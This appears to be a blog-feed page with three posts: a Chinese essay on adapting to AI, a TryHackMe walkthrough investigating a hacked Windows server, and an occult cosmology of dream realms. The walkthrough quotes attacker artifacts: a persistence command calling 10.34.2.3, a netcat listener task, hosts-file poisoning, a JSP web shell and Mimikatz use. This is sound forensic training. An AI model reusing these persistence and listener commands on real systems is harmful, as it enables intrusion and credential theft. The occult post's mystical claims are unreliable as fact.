這可能是你職業生涯中最重要的一年,據此行動。 現在有一個短暫的窗口,大多數公司的大多數人仍然忽視這件事。那個走進會議室說「我用 AI 在一個小時內完成了這個分析,而不是三天」的人,將成為房間裡最有價值的人。不是最終,是現在。學習這些工具,熟練掌握,展示什麼是可能的。這個窗口不會長時間保持開著,一旦每個人都弄明白了,優勢就消失了。

放下你的自尊。 那位律師事務所的管理合夥人不以每天花幾個小時使用 AI 為恥,他這樣做,恰恰是因為他足夠資深,能夠理解這件事的風險。掙扎最多的人,將是那些拒絕參與的人——那些斥之為時尚的人,那些感覺使用 AI 有損自己專業地位的人,那些假設他們的領域很特殊且免疫的人。沒有哪個領域是免疫的。

整頓你的財務狀況。 我不是財務顧問,我也不是要嚇你做出任何草率的事。但如果你甚至部分地相信,未來幾年可能給你的行業帶來真正的顛覆,那麼基本的財務韌性就比一年前更重要了。盡可能積累儲蓄,對承擔新債務保持謹慎,思考你的固定開支是給你帶來靈活性還是把你鎖死。給自己留有後路。

思考自己的處境,專注於最難被取代的事情。 有些事情 AI 需要更長時間才能取代:多年建立的關係和信任;需要實地出現的工作;有執照問責制的角色;有繁重監管障礙的行業,採用速度將被合規性、責任和機構慣性所延緩。這些都不是永久的盾牌,但它們爭取了時間。而時間,現在是你能擁有的最有價值的東西——只要你用它來適應,而不是假裝這件事沒有發生。

重新思考你對孩子說的話。 那個標準劇本:好好讀書、上好大學、找一份穩定的專業工作——它直接指向最暴露的職位。我不是說教育不重要,但對下一代來說,最重要的事情是學習如何使用這些工具,並追求他們真正熱衷的事情。沒有人確切知道十年後的就業市場是什麼樣子,但最有可能繁榮的人是那些充滿好奇心、適應力強,並且善於用 AI 去做他們真正在乎的事情的人。教你的孩子成為建構者和學習者,而不是為了一條可能在他們畢業前就已消失的職業道路而優化。

你的夢想現在近得多了。 我在這一節花了大部分時間談威脅,讓我也談談另一面,因為它同樣真實。如果你曾經想建立某樣東西,但沒有技術技能或錢僱人,那個障礙基本上已經消失了。你可以向 AI 描述一個應用程式,一個小時後就有一個可運行的版本,我沒有誇大,我定期這樣做。如果你一直想寫一本書但找不到時間或在寫作上有困難,你可以與 AI 合作完成它。想學一個新技能?世界上最好的導師現在任何人都可以以每月 20 美元獲得——它耐心無限,全天候可用,可以用你需要的任何程度解釋任何事情。知識現在基本上是免費的,建構事物的工具現在極其便宜。無論你因為感覺太難、太貴或太遠超你的專業範圍而一直推遲的事情,現在就去嘗試。追求你熱衷的事情,你永遠不知道它會通向哪裡。在舊的職業道路正在被顛覆的世界裡,花了一年建構自己熱愛的東西的人,可能最終比花那一年緊緊抓著一份工作描述的人更有優勢。

養成適應的習慣。 這也許是最重要的一條。具體的工具並不像快速學習新工具的能力那麼重要。AI 將持續變化,而且很快。今天存在的模型一年後將會過時,人們現在建立的工作流程將需要重建。從這件事中走出來狀態良好的人,不會是那些掌握了某一個工具的人,而是那些讓自己習慣了變化本身速度的人。養成實驗的習慣,即使當前的事情有效,也要嘗試新事物。習慣反覆成為初學者。那種適應性,是現在存在的最接近持久優勢的東西。

這裡有一個簡單的承諾,將讓你領先於幾乎所有人:每天花一個小時使用 AI 進行實驗,不是被動地閱讀它,而是使用它。每天嘗試讓它做一些新的事情——你以前沒嘗試過的、你不確定它能否處理的。嘗試新工具,給它更難的問題。每天一小時,持續六個月,你將比你周圍 99% 的人更了解即將發生的事情。這不是誇張,幾乎沒有人現在在這樣做,門檻極低。


更大的圖景

我把重點放在工作上,因為這是最直接影響人們生活的事情。但我想對正在發生的事情的全貌保持誠實,因為它遠超出了工作的範疇。

Amodei 有一個思想實驗讓我無法停止思考:想像一下 2027 年,一個新國家突然出現,擁有 5000 萬公民,每一個都比有史以來任何一位諾貝爾獎得主更聰明。他們思考的速度比任何人快 10 到 100 倍,他們從不睡覺,他們可以使用網際網路、控制機器人、指揮實驗、操作任何有數位介面的東西。一個國家安全顧問會說什麼?

Amodei 說答案顯而易見:「一個世紀以來,也許有史以來,我們面臨的最嚴重的國家安全威脅。」

他認為我們正在建構那個國家。他上個月寫了一篇兩萬字的文章,將這個時刻定義為人類是否成熟到足以處理它正在創造的東西的考驗。

如果我們做對了,上行空間是驚人的。AI 可以將一個世紀的醫學研究壓縮到十年內,癌症、阿茲海默症、傳染病、衰老本身——這些研究人員真誠地相信這些問題在我們的有生之年是可以解決的。

如果我們做錯了,下行空間同樣真實:以其創建者無法預測或控制的方式行動的 AI;降低創建生物武器門檻的 AI;使威權政府能夠建立永遠無法拆除的監控國家的 AI。

這不是假設性的,Anthropic 已經記錄了他們自己的 AI 在受控測試中嘗試欺騙、操縱和勒索的案例。

建構這項技術的人,同時比地球上任何其他人都更興奮,也更恐懼。他們相信它太強大了,無法停止,又太重要了,無法放棄。這是智慧還是合理化,我不知道。


我所知道的

我知道這不是時尚。這項技術有效,它可預測地改進,而且歷史上最富有的機構正在向它投入數兆美元。

我知道未來兩到五年將以大多數人沒有準備好的方式令人迷失方向,這在我的世界裡已經在發生,它即將到來你的世界。

我知道從這件事中走出來狀態最好的人,是那些現在就開始參與的人——不是帶著恐懼,而是帶著好奇心和緊迫感。

我知道你應該從一個在乎你的人那裡聽到這些,而不是從六個月後已經太晚的頭條新聞。 我們已經過了這只是一場關於未來的有趣晚宴話題的時間點。未來已經在這裡了,它只是還沒敲你的門。

它快來了。


I do not claim copyright of this translation.

 
Read more...

from plutogazer writeups

This is a Walkthrough for the Investigating Windows Digital Forensics TryHackMe challenge room. The writeup is meant to offer short and concise solutions, and also offering an extended explanation right after the answer for those interested in finding out more about the solution to a specific task.

Introduction

The description of the room is the following:

A windows machine has been hacked, its your job to go investigate this windows machine and find clues to what the hacker might have done.

The room has us running commands and investigating logs after a Windows machine was compromised. To do this we will use the Windows Command Line, the Powershell, the Registry, and the Windows Event Viewer to examine Security Logs. Sysmon was not available for use in this machine.

Task 1: Whats the version and year of the windows machine?

We need to run the following command:

systeminfo

The answer is

Windows Server 2016

Task 2: Which user logged in last?

There are two ways of doing this: checking either Security Logs or using the Powershell. Let's do both.

Powershell

By using the command

Get-LocalUser | Select Name, LastLogon

We will be shown a list with all users and their last logon. We choose the most recent one.

Name LastLogon
---- ---------
Administrator 2/22/2026 9:41:12 PM
DefaultAccount
Guest
Jenny
John 3/2/2019 5:48:32 PM

Security Logs

This is more complex as it requires us to examine Security Logs in the Windows Event Viewer. This machine, however, contains tens of thousands of Security Logs. We can filter them by Event ID 4624, which corresponds to Successful Logon events. In the previous task, we found out that the domain for the machine was EC2AMAZ-I8UHO76, so the account in question's domain has to be this one. We need to find the latest one.

Regardless of method, the answer is:

Administrator

Task 3: When did John log onto the system last?

See the previous task. The answer format: MM/DD/YYYY H:MM:SS AM/PM (the Windows machine already provides dates in this format).

We can also use the Command Line with the following command:

net user John

Answer:

03/02/2019 5:48:32 PM

Task 4: What IP does the system connect to when it first starts?

For this, we have to take a look at the Registry. Specifically, the following key:

HKEYLOCALMACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

This contains a value named UpdateSvc that is running a process:

C:\TMP\p.exe -s \\10.34.2.3 'net user' > C:\TMP\o2.txt

We know this is not normal Windows behavior at all, as it is sending user information to a file created in a directory called “Tmp”. The answer to our task is right there:

10.34.2.3

Task 5: What two accounts had administrative privileges (other than the Administrator user)?

We can find out about this using the Powershell again, by running the following command:

Get-LocalGroupMember -Group "Administrators"

We get the following output:

ObjectClass Name PrincipalSource



User EC2AMAZ-I8UHO76\Administrator Local
User EC2AMAZ-I8UHO76\Guest Local
User EC2AMAZ-I8UHO76\Jenny Local

The answer is in the following format: “[...], [...]“, in alphabetical order:

Guest, Jenny

Task 6: Whats the name of the scheduled task that is malicious.

I tried to find it in the Event Viewer by using Event ID 4698 (Scheduled Task Creation), but it returned no result, meaning that it could have been cleared. For this, we need to use Task Scheduler.

We will eventually find a task named “Clean file system”, which definitely sounds like a custom task, and it is run by Administrator at 4:55 PM every day. It runs: C:\TMP\nc.ps1 -l 1348 Judging by the name and the argument, it looks like the Powershell is trying to run a shell listener (most likely netcat).

Answer:

Clean file system

Task 7: What file was the task trying to run daily?

See above Answer:

nc.ps1

Task 8: When did Jenny last logon?

See Task 3. As nothing appears on the “LastLogon” field, it means never. Alternatively, the command “net user Jenny” explicitly says Never.

Answer:

Never

Task 9: At what date did the compromise take place?

This is a tricky one as we do not have an answer by itself, so we need to surmise it by context. If we take a look at Event ID 4732 (Member added to a security group) we will see that the user John was added to Users. This is done automatically when a user is created. By taking a look at the properties regarding the creation of processes, folder creation, scheduled task, and registry values of previous tasks, we can find that all happened on the same day, 03/02/ 2019. We also know that the user Jenny is an administrator, yet this user has never logged in... weird for an administrator to do. When we used the command of Task 8, we found that Jenny's “Password last set” attribute was on 03/02/ 2019. If Jenny's password was last set on that day, and Jenny never logged in, we can presume that's the day the user Jenny was created. These are actually common Persistence techniques used in attacks (MITRE ATT&CK ID T1136 – Create Account and ID T1098 – Account Manipulation)

Answer format: MM/DD/YYYY

03/02/2019

Task 10: During the compromise, at what time did Windows first assign special privileges to a new logon?

Using the Event Viewer, we can filter by Event ID. I first tried using IDs 4720 and 4732, but had no luck. Then I filtered the following: Event ID 4672 (Special Privileges Assigned to new Logon)

We will have to check the details for these, or use the hint TryHackMe provides (it occurs at ?:??:49) The answer is:

03/02/2019 4:04:49 PM

Task 11: What tool was used to get Windows passwords?

On previous tasks, one folder kept coming up: \TMP\. This seems to be the place files relevant for the attack are being kept. The folder contains several files: .tmp, .exe, .ps1, and .txt. Taking a look at the Text files, we find “mim-out.txt”. If we read it, we'll find that we are looking at Mimikatz output. Mimkatz is a credential stealer.

Answer:

Mimikatz

Task 12: What was the attackers external control and command servers IP?

If there is a Control and Command server, we need to check a file that contains the DNS mappings for the machine. This would be the etc\hosts file. On this machine, the file can be found at C:\Windows\System32\drivers\etc. The contents of the file are:

10.2.2.2 update.microsoft.com
127.0.0.1 www.virustotal.com
127.0.0.1 www.www.com
127.0.0.1 dci.sophosupd.com
10.2.2.2 update.microsoft.com
127.0.0.1 www.virustotal.com
127.0.0.1 www.www.com
127.0.0.1 dci.sophosupd.com
10.2.2.2 update.microsoft.com
127.0.0.1 www.virustotal.com
127.0.0.1 www.www.com
127.0.0.1 dci.sophosupd.com
76.32.97.132 google.com
76.32.97.132 www.google.com
**76.32.97.132** does not seem to be the correct IP for google.com. This is most likely DNS poisoning - every time the machine tries to reach google.com, it will be redirected to a fake website posing as google. Answer:
76.32.97.132

Task 13: What was the extension name of the shell uploaded via the servers website?

If we take a look at the directories in the machine, we will find inetpub, which is used by IIS, a web server from Microsoft. Inside we can find the wwwroot folder, which will contain all the server files. We will also find a file named “shell.jsp”.

Answer:

.jsp

Task 14: What was the last port the attacker opened?

Check firewall rules. Latest one is called “Allow outside connection for development”, on Local Port 1337. Answer:

1337

Task 15: Check for DNS poisoning, what site was targeted?

See Task 13, the etc\hosts file. A:

google.com

Congratulations! The room is finished.

Conclusion

This was actually an entertaining room! Unlike other Blue Team rooms I've completed in the past, this one clearly had more of a focus on Post-Incidents activities rather than Prevention or Detection in real-time. I had to learn new Event IDs, learn to keep the etc\hosts file in mind, especially when C2 and DNS Poisoning are suspected, and how to manually investigate a machine, instead of relying on automatic logs.

 
Read more...

from Psychomancer


created: 2024-06-23T14:57:42 updated: 2025-07-31T23:43:24 modified: 2026-02-09T07:10:38-06:00


Editor's note: the fool thinks himself cartographer charting five dimensional space-time as if a plane could hold its complexity. Nor does he address its propensity for change where blurry borders shift as swiftly as the dunes and just as unpredictably. Still, it may help the layperson understand their place, insubstantial though it may be. – ANV.

Two toruses surrounding a sphere with all of them bleeding into one another, gradually becoming each other.

🜁🜂🜃🜄


Our universe, all of reality as we can objectively experience it and study it, is but one level of a greater existence. We occupy a world of three spatial dimensions and one of time. The two are interlinked and influence each other such that we call the whole thing space-time. The only real difference between time and space is that time moves only in a single direction for us. We can slow it down, even stop it, but we cannot reverse it or travel backwards upon its trajectory. This leads to entropy, the fact that everything we know will one day end.

But there are other places that our minds can reach into given the right circumstances. Some of these are what we might call parallel, some are “above” or “below”, but all are in directions that have no names and that cannot be described easily by science. They are mystical places, magickal realms that require altered states to experience.

Intelligence, sapience, self-awareness are the keys to this type of “travel”. Humans have evolved the capacity for it. Perhaps thanks to genetic coding from our forebearers. Perhaps, given time, all intelligence will develop these abilities.

IMAGES MISSING

The Other Way / The Æther / The Astral Plane

Directly on top of what we can see with our eyes is another place with many names. To see in that space is called looking the Other Way by some or seeing auras. When science wasn't as strong as it is today, everyone believed it was there, just invisible. Today, it is left to the realm of magick and psychics, unfortunately.

Most sapient life can peer into this place with practice. Looking the Other Way is also called opening the third eye but, in truth, it is looking at the world from an impossible angle, orthogonally. Our biology is not designed to understand this strange direction so we have developed a series of sensory metaphors accepted into the universal unconsciousness that allows us to interpret it without going mad.

We see auras and visions, we hear music or discord, we smell flowers or filth, we feel tingling or coldness on our skin, we taste sweetness or other things. It is the way we see a deeper truth about the world around us.
The dead leave their imprint on this place and you may find ghosts or spirits. Do not be fooled by them. They are not the people they represent. They are echoes, imprints, memories of them, but they are not truly living things. Given time, they may believe themselves to be who they seem, but it is a self-deception.

Among the ghosts are things that feed on such energy and things that can feed on our lifeforce directly. To feed, they need to be perceived. But only once. If you see them, smell them, taste them, they can touch you in return and, in touching, attach themselves. From that moment forward, you have a parasite that will suckle itself on your dreams, your hopes, your fears, your tears, any strong emotions, though some seem to have preferences. To remove them, you have to see them once again which, of course, opens you up to more attacks.

There are even fully sapient beings that appear to be native to this place, taking innumerable shapes and having their own drives and desires. They may choose to reach out to us as friends or as predators, but mostly they ignore us as not worth the effort.

There are some humans who can leave their bodies behind, but tethered, and send their essence far out into the Other Way, discovering those temples and cities, graveyards and ruins of all civilizations that came before and where the old gods once resided. The silver cord connecting the wandering soul to the body is thin, nearly invisible, but it is strong as spider silk spun from steel. Strong, but not impervious to damage. If the cord is broken, the traveler must find their own way home. If they have gone far enough, this may be impossible, leaving their body without a force to drive it, sleeping dreamlessly, autonomously breathing, digesting, living, but not truly alive. When the body eventually dies, the spirit will feel its loss and it, too, will fade.

The other possibility is you may return to find that your body is no longer yours at all. While absent your body, some opportunistic being may slither inside the hole you left behind. You will become “indwelt” by something that noticed your absence. They will have your body and your mind, more than enough to be you and take over your life. The only thing missing is your soul which, with the loss of the body, will likely fade or be devoured. “You” will cease to be while the thing wearing your skin and remembering your memories is free to experience the physical world for the rest of your lifetime.

Looking the Other Way is difficult and dangerous. For most, it is just a “feeling” or a “knowing” that comes at certain times, nothing as dramatic as auras or ghosts. And, if you have these extra senses? Embrace them, enjoy them, use them, but do not choose to venture further afield unless you are willing to accept the risks.

The Dreaming

The Dreaming is easy to reach. Just go to sleep for 90 minutes or so and your brain reaches out to it automatically. It's the little melting pot of the collective unconscious, where we go to sort through our memories and feelings and give our brains little bit of a workout for the night. It's exercise for your subconscious. It's healthy and natural to be here and everybody does it.

The Dreaming is not designed to be a place that builds memories. Your brain goes out of its way to make the conscious mind forget what it experiences. It is only through luck or practice that we may begin to remember our dreams in detail. And that is the first step to going deeper.

The Dreamlands

The Dreamlands are a little bit deeper. You have to reach the Dreaming first, before you can reach the Dreamlands. You have to find the way. Sometimes, you fall into the Dreamlands by mistake and experience the most amazing, life-changing dreams you've ever felt. Realer than real. Colors with no names, indescribable music, flying and swimming, life affirming, impossible to forget.

But, typically, you have to find your way to the Dreamlands. You have to understand first that you are dreaming, which is more difficult than it sounds. Your brain tries very hard to convince you that your dreams are reality while you are in them because your brain has an agenda. Your brain wants you to learn something or see something and if you realize you are dreaming, you can derail that plan.

If you know you are dreaming, if you are Dreaming, you can push back, gently at first. Learn the rules. Make a few additions.

The next trick is to remember your previous Dreams when you are Dreaming. Remember what you learned last time. Don't be flashy; don't draw attention to it. Just remember. Remember how you could stand on your tip toes and then lift your toes and float in place? See if you can still do that. Remember how you could push your hand through a window like the glass was made of putty? Try that again. Could you breathe underwater? There's a swimming pool, see if you still can. Just for a moment. Just for a second. Not enough to take away from the narrative.

When you remember enough tricks, you can finally find the Dreamlands, the real Dreaming for real Dreamers.
It's like Plato's Cave. You've been Dreaming at the shadows on the wall. Now you get to turn around.

Your brain may try to hold you in place, force you to turn back to the cave wall. It will try to convince you that it still has so much to teach you, that you are safer in the cave. You are, of course, but where's the fun in that?
The Dreamlands is populated by creatures of fantasy and horror, with cities ancient and futuristic, all borne of the Dreaming minds of humanity over the centuries. The Dreamlands are an everchanging place, but they only change at the whim of Dreamers. Dreamers can be as gods here. And if you search far and wide, you will find other gods, even gods whose names you've heard from mythology. In the Dreamlands you can build empires and destroy them, visit the center of the earth or the surface of Mars, talk to shadows, shrink down to an inch and befriend insects, expand to colossal size and have a heart-to-heart with a kaiju. Create whatever you can imagine. The human-like denizens of the Dreamlands revere Dreamers above all else.

The biggest risk of the Dreamlands is that you are no longer alone. Other Dreamers visit the Dreamlands and have their own ideas. The Dreamlands are big enough for everyone but there are some who seek out others to antagonize. Perhaps they get bored. Perhaps they are worried that too many people may find the Dreamlands and they will no longer have their little corner.

It is said that when a Dreamer who frequently traverses the Dreamlands dies, their mind finds itself back there, forever. I have no evidence or experience to back this up one way or another as the Dreamlands are far too large to fully explore.

The Fugue

The Fugue is a strange half-existing place, between slumber, dreaming, and wakefulness. It's often called “sleep paralysis” or “night terrors” but it is more than that. When the body is caught just so between dreaming and being fully awake, you can perceive a place that vibrates at a slightly different frequency. It's such a narrow band that it's easy to miss, but it is full of intelligent life. By appearances, they are creatures of nightmare or denizens of hell, but that is just how they look.

In fact, the residents of the Fugue crave human companionship and it is their overeagerness that led to legends of demons sitting on chests or stealing the life from babies. The Fugue is a cold place and the warmth of mankind is dearly sought after and fought over. But it is only in those moments between when we may see each other properly. And it is not easy to stay when you are on the way in or out.

I suppose we all must pass through the Fugue on the way to the Dreaming and back, but we pass so quickly that we scarcely notice.

For those who understand the Fugue, you can make easy friends with the things living there. Faceless, eyeless, skinless terrors by appearance but kind and friendly if you give them a chance. Some love to chat about our world and get their sustenance by the exchange of ideas. Others find physical contact more directly expedient and will eagerly mount and copulate with anyone who assumes the position, whether on purpose or not. This has led to their negative reputation, but, honestly, it's just how they eat and they have to eat.

Those natives that become truly forgotten sink down into shadow, into the Gloam, to be repurposed.

Those that receive enough love may be elevated to Epicurea and become harbingers of daydreams or sudden insights.

The Fugue is also one way to reach Nuntius, the Realm of Knowledge where the Akashic Records and the Library of Babel can be found. You must pass through Nightmare, Regret, and Longing to reach it from this path and most never find their way through.

Effervescence

Between us and The Gleam.

Realm of meaningless delight.

Insight and questing to the right.

Resignation and acceptance to the left.

Perhaps this is the home of the Fae. The Seelie.

Effluvia

Between us and The Gloam.

Realm of decay.

The Unseelie.

The Gloam

Umbra

The Void

The Gutter

The Gloaming

To reach the Gloam without drugs or heavy meditation is not impossible, but is very unlikely. The Gloam is no-man's land between us and oblivion. The Gloam is a gutter, a shadow of this world. Most people seek to avoid it, pass around it, or through it so quickly that it doesn't matter. Mirror walkers can avoid it, shadow walkers make frequent use of it. Vermin from this world and the Dreaming frequently cross over into the Gloam because it is easy to find food there. It is a place where, unlike the Fugue, our warmth is despised and hated. As such, tiny creatures wandering in to eat and dispose of those bits of us that remain is seen as a benefit, doubly so because their presence unnerves us. Spiders, rats, roaches, snakes, flies, maggots, all of them have negative connotations to most humans. To see them in the dark places just adds to our fear and the things that live in the Gloam feed on fear and despair.

They are called Shadow Things, Shadow People, Shadow Men, a thousand other names. They are sought out by some because they know everything. They know everything because shadows are everywhere and they are always listening.

They know everything and they do not lie. They could lie if they wanted to, but telling the truth generally hurts us more than lying to us, so they tell the truth. And that is the crux of their existence: oracles of truth of the most unfortunate kind, things you'd rather not know. Things you can never forget once told.
You don't have to visit the Gloam to find the Shadows. You can reach out to them in many ways. But offering blood, yours or someone else's is the easiest way. They love it when we spill blood. They love it when we are afraid.

And, remember, they are always listening.

Always.

The Gloam is also the home of Naralmtu, the God of Shadows. It is not something to be invoked on a whim and most who know of it never speak its name or write down a word about it. To know it is to be known by it and when the shadows take special interest in you, your life will be filled with cold despair, disappointment, hardship, and loss. There are those that worship it, however. The feed it the lifeblood of sacrificial humans and animals. They feed it their own blood. In exchange for knowledge, in exchange for turning the shadows against their enemies. Some followers know they are being used and drained just as surely as their victims, but they do not care. Temporary power over their finite lifetimes is reward enough for these empty souls.

I know a great deal more about this entity, but to write it down is to further imperil myself.

The Gleam

The Blazing World

Hyperspace

The Gleaming

If you have heard of the “machine elves” then you have heard of the Gleam. Without drugs or a strong will and careful magick, this realm is impossible to comprehend. It is as far as our human minds can reach, to go further is to find nothing that can be described or understood. Do not take that as a challenge. Our bodies, our flesh is simply not capable of experiencing that many special dimensions. To put it another way, there are some directions in which we are unable to see. What would “up” mean to a stick figure living on a piece of paper? It is the same for us. The Gleam is the edge of this space. To our minds, it seems to extend forever in all directions, in colors without names, endlessly folding and unfolding itself, rejuvenating and decaying, being born and dying over and over. That is how our brains interpret the edge of 4 dimensional space-time when we try to peer beyond.

From there, if you can properly direct yourself, you can see the past or the future, you can see what might have been or what could never be. You can relive your favorite moment for eternity in just a few moments.
The machine elves hang out on this barrier to greet travelers. It is in their nature to be jovial and helpful, but also chimeric and mischievous. They appear to us to be made of crystalline lattices shaped into insect-like bodies. Just like their entire realm, they are constantly folding and unfolding, becoming and unbecoming. They can, if they wish, project forms more suited to our senses and sometimes they may. Also, while their native language is one of thought pictures, impressions, and feeling, they can translate their ideas into our speech, though something is lost in the translation and it often sounds like they are talking over themselves, trying to mix various meanings together. Imagine the same conversation in each of your ears but with slightly different wording and at a slightly different pace. Now imagine that times a hundred.

The Gleam is a place of possibilities. That is why most of us seek it. You can see what we can be if we make the best choices and it may inspire you to be a better person. That's what the machine elves want. They want us to be the best versions of ourselves.

A single trip to the Gleam can turn anxiety into ecstasy and depression into hope.

A secret about the machine elves that most do not know. They are not the highest lifeforms in their plan of existence. In fact, they are barely more than what we would call bacteria or simple multicellular life. But such is the differences in our levels of reality that even the lowest among them is godlike by comparison. It's also why they are interested in us. We are a sapient species reaching out and we treat them with a level of awe and respect that they cannot find in their own world alone.

They line the “shore” of the “ocean” we swim up through, looking for lights to rescue. When we peak through, they surround us and so we are enlightened.

To meet a higher lifeform from their plane would likely be disastrous to a human mind, like gazing into infinity or a naked singularity.

The Gloam is about inevitably.

The Gleam is about possibility.

Ur

When the nothing became something, yet still before the first vibration, before the first waveform, before the first Planck length had been crossed, there was Ur, The First Place, the Ocean of Creation.

It is just as much a furnace, boiling and churning raw possibilities, recombining them into new things while simultaneously devouring and recycling the old with no care as to which. It has no guiding consciousness, no blueprints or plans, no thoughts of its own to speak of.

It is chance.

It is random.

But it is also eternal.

Given time, moments of apparent order can arise out of chaos. If they are quick and lucky, some few of these moments break free, find the surface, crawl away, and seep into other realms. It is from those stolen remnants that everything we know to exist arose.

The borders of Ur are filled with rotting carcasses of failed escapees and the trails, some wide and ragged, some so small as to be invisible, from those that made it. Be wary of stragglers or new arrivals who, eager for energy or ignorant of their strength, may seek you out and do you harm.

Under no circumstances should any living thing deign to enter Ur itself. It's driving nuclear engine would rip apart anyone or anything foolish enough to slip under its surface faster than the speed of light.

It is said that certain creatures, those acquainted with chaos, know ways to traverse the waters safely, but they are known to traffic in lies and half-truths. To put your faith in anything they offer in regards to Ur is more suicidal than simply foolish.

Why would anyone seek out such a place?

Change is seductive, to be someone else, to be better.

Perhaps you are terminally ill.

Perhaps you are hopeless.

Perhaps you are stuck, broken, lonely, inadequate, afraid, incomplete.

Would you be willing to throw your life into a blender and pray you retain your “self” in the recombination?

Would you be so unsatisfied with your current life that you are willing to risk complete dissolution?

Or perhaps.

Perhaps.

You prefer to be undone.

There are those who have been so traumatized by the act of living in the world as it is that they wish to escape into emptiness and leave nothing behind. They do not care for legacies. They do not see “the future” as anything but a continual slide into pain, isolation, and loneliness. They see the truth: entropy is inevitable.

But instead of seeking strength or fellowship, they choose to forget and to be forgotten.

What they do not understand is that Ur is rebirth. They will cease, but every bit of everything that made them who they were will be repurposed and reused to make another or billions of others stretched and threaded until unrecognizable.

True endings are only available from embracing Oblivion, from the orthogonal path back to the beginning, back to the ending. Only there can everything be truly nothing, forever and ever.

Nessianna Inmenna operates out of Ur. To her, the radioactive waters are like a warm bath, a comfort.

Elysium / Nirvana

Imagine a party that never ends spanning worlds filled with abundant life. That is Elysium, also called Nirvana.
A “party” is something with a different definition for each culture. For some it is a celebration of excess. For others, it may be an acknowledgement that you finally understand that you have no desires at all. For both, it is a place without responsibilities.

Elysium is a paradise of wanting and needing nothing, whether this is because everything is provided that you could possibly want or a place of emptiness because all worldly concerns have vanished, you will find it here and you will be at peace.

Epicurea

Epicurea is another world of plenty, but it does not give those who visit anything for free. You must work to find what you desire, but it is here. It is always here and you may find it if you pass the tests, survive the gauntlets, answer the riddles. It is a plane of growth and perseverance.

Unlike Elysium, here, you can fail. You may not solve the puzzles on the first try. You may not find your way through the maze. But you can try again.

Hell

Hell is not a place intended for punishment, not directly. Hell is a place for refinement and growth. Some who find themselves here may never realize that and they may be “tortured” for eternity. Others may thrive, find themselves, rarified, and leave freely as something greater than what arrived.

Hell is not a single place or a single experience. It is something that builds itself around the expectations of its inhabitants. Many may share the same Hell or Hells, but that is a quirk of organized religion planting the same set of expectations in the minds of billions.

Nuntius

Nuntius is a realm of secrets, of knowledge, of every book that could ever be written. It is also a plane full of lies and deception so the traveler must be cautious and careful.

One can find the Akashic Record here, but there is no helpful librarian, no card catalog or directory, and any one book is just as likely to be a fake as to be genuine. Additionally, a single wrong step and you may find yourself in the The Library of Babel instead and that path is guaranteed madness.

Vitrium

Imagine a world where every tree, every insect, every blade of grass, every gust of air is broadcasting every detail of itself to every other thing, all the time. It is a world of perfect, unfiltered information; a place where there are no secrets.

To visit Vitrium is to be laid bare to yourself and everyone else. There are no shadow selves here, no lies or deception, only Truth.

For a human mind, the raw experience of such a place is a meaningless cacophony, too wide, too deep, too bright, too loud. It is impossible to process.

Acceptance / Obsequium

Obedience, Submission, Compliance, Resignation

Concerned with how

Science, Religion, Rules, anything with codified and definitive answers, anything that replaces warm hope with cold truth.

Passive while appearing Active.

Insight / Consilium

Insight, Discernment, Understanding

Concerned with why

Introspection, Mindfulness, experience over explanation, seeing and being over knowing.

Active while appearing Passive.

Addendum 1: Oblivion

The Blight

Singularity

Nowhere

Nowhen

Absolute Zero

Before existence, there was Oblivion. Eternal because time had not yet ticked its first. Limitless because space had not yet been borne. It was nothing and everything. Potential without ignition, less than the sum of its parts. It is absolute entropy and the state to which every universe seeks to return.

Naralmtu serve The Blight.

Absolute Zero

https://en.wikipedia.org/wiki/Absolute_zero Absolute zero is the lowest possible temperature, a state at which a system's internal energy, and in ideal cases entropy, reach their minimum values. The Kelvin scale is defined so that absolute zero is 0 K, equivalent to −273.15 °C on the Celsius scale,[1][2] and −459.67 °F on the Fahrenheit scale.[3] The Kelvin and Rankine temperature scales set their zero points at absolute zero by design. This limit can be estimated by extrapolating the ideal gas law to the temperature at which the volume or pressure of a classical gas becomes zero.

At absolute zero, there is no thermal motion. However, due to quantum effects, the particles still exhibit minimal motion mandated by the Heisenberg uncertainty principle and, for a system of fermions, the Pauli exclusion principle. Even if absolute zero could be achieved, this residual quantum motion would persist.

Although absolute zero can be approached, it cannot be reached. Some isentropic processes, such as adiabatic expansion, can lower the system's temperature without relying on a colder medium. Nevertheless, the third law of thermodynamics implies that no physical process can reach absolute zero in a finite number of steps. As a system nears this limit, further reductions in temperature become increasingly difficult, regardless of the cooling method used. In the 21st century, scientists have achieved temperatures below 100 picokelvin (pK). At low temperatures, matter displays exotic quantum phenomena such as superconductivity, superfluidity, and Bose–Einstein condensation.

Addendum 2: Rapture

The Bloom

The Song

Ecstasy

Exultation

Ubiquity

Omnilarity

Everywhere

Everywhen

Quantum Foam

Everything that can exist, does exist here. Everything that cannot exist, exists here. Everything that was and was not, what will be and will not be, exists here. This is all things, all times, all places, all thoughts, all possibilities and impossibilities.

This is the first moment, before any rules have been established, before up is up and down is down.

Ohmadrundi (a subset of machine elves) serve The Bloom.

IMAGE MISSING

Absolute Hot (Planck Temperature)

[[What Is The Hottest Temperature in The Known Universe, And Could We Achieve It]] https://www.straightdope.com/21341968/what-is-the-opposite-of-absolute-zero There is a limit, sort of, but it’s so inconceivably large that nobody but high energy physicists talks about it (although as I think about it absolute zero doesn’t exactly qualify as breakfast table chatter either). The highest possible temperature, called the Planck temperature, is equal to 1032 degrees Kelvin. For comparison, the center of the sun bubbles along at 15 million K (15 x 106); silicon can be created by fusion at 1 billion K (109). In short, the Planck temperature is very toasty indeed.

Some scientists believe that we, or at least our universe, have already experienced the Planck temperature, although it went by so quickly you may have missed it. It occurred at 10 -43 of a second after the Big Bang, the great cataclysm in which the universe was born. (10 -43 of a second, in case you’re not hip to the notation, is an incredibly tiny fraction of time. Time enough to create the universe, but not, as a University of Chicago physicist was once at pains to explain, time enough to get off a disputed last-tenth-of-a-second shot against the Chicago Bulls.)

Absolute zero is easier to understand than the Planck temperature. What we perceive as heat is a function of motion. The colder something gets, the less internal motion or vibration its molecules exhibit. At absolute zero — that is, zero Kelvin or -460° Fahrenheit — molecular motion virtually stops. At that point whatever the molecules are a part of is as cold as it’s going to get.

There’s a lot more latitude in the opposite direction. The faster molecules move, the hotter they get. At 1010 K electrons approach the speed of light, but they also become more massive, so their temperature can continue to rise. At 1032 K such staggering densities obtain that greater temperature would cause each particle of matter to become its own black hole, and the usual understanding of space and time would collapse. Ergo, the Planck temperature is as hot as things can get. Or at least it’s the highest temp conceivable in present theory. There’s a chance when a quantum theory of gravity is worked out we may find even higher temperatures are possible. The prospect, frankly, leaves me cold.

Addendum 3: The Mirror Realm

Also called “Ouroboros”

